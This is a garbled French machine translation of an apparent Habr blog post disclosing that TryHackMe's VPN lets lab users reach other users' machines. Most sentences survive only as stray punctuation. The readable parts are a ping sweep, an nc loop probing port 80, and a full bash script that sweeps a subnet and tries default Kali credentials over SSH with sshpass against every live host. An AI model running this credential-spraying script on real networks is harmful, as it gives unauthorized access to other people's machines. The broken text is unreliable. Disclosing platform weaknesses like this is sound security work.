🤞 👋🏾 👩🏼‍🌾 "Hack Me on TryHackMe", ou recherche de sécurité de l'information non sécurisée sur une plate-forme connue 🚵🏾 👩🏽 🧜🏻

Bonjour Khabrchane. Aujourd'hui, nous allons parler d'un problème découvert par mon bon ami Ivan Glinkin .

Il s'agit d'un jambage très sérieux avec la sécurité de la plate-forme de formation TryHackMe pentest. Cela consiste dans le fait que les stands virtuels voient absolument tout sur le réseau, et ils peuvent être utilisés pour attaquer les utilisateurs du service.

3 :

, . TryHackMe ;
, ( );
.

DSCLAIMER

, . , TryHackMe, , , . .

. IT- , . , .

, , «*, *, ».

VPN , , . ? !

, ? -, , ?

! , , .

«Basic Pentesting».

En tant qu'attaquant, nous avons... — ...

kay , , TryHackMe , . . 10.9.5.0

for ip in {1..254}; do ping -w 1 10.9.5.$ip | grep -i "ttl"; done

. , ? , , 10.9.4.0 …

...

, ! , SSH , Apache.

IP nc 80 , nc .

for ip in $(cat ips.txt); do nc -nvw 1 $ip 80; done

. CURL’ 10.9.4.252 www , :

Je suis sûr que pour beaucoup de gens, le répertoire du serveur Web sur Kali ressemble à ceci — , - Kali

, SSH. . sshpass, curl, wget . , , - .

! .

root- ! root , , , kay sudo. ?

sshpass bash :

#!/bin/bash
for ip in {2..255}
do ip_check=$(ping -w 1 10.9.5.$ip | grep -i "icmp_seq" | cut -d " " -f 4 | cut -d ":" -f 1)
if [ ! -z $ip_check ]
then
echo -e "\e[01;32mHost $ip_check is up. Cheking SSH\e[00m";
nc -vz -w 2 $ip_check 22 > log.txt 2>&1;
ssh_refused=$(grep -o "refused" log.txt)
ssh_timeout=$(grep -o "timed" log.txt)
if [ ! -z $ssh_refused ]
then
echo -e "\e[01;31mSSH is closed. Going further. \e[00m";
echo " ";
elif [ ! -z $ssh_timeout ]
then
echo -e "\e[01;31mSSH doesn't respond. Going further. \e[00m";
echo " ";
else
echo -e "\e[01;32mSSH is open. Trying to connect... \e[00m";
sshpass -p "kali" ssh -o StrictHostKeyChecking=no kali@$ip_check;
sshpass -p "toor" ssh -o StrictHostKeyChecking=no user@$ip_check;
sshpass -p "toor" ssh -o StrictHostKeyChecking=no root@$ip_check;
echo " ";
fi
fi
done
rm log.txt;
echo -e "\e[01;32mEnumeration has been finished! \e[00m";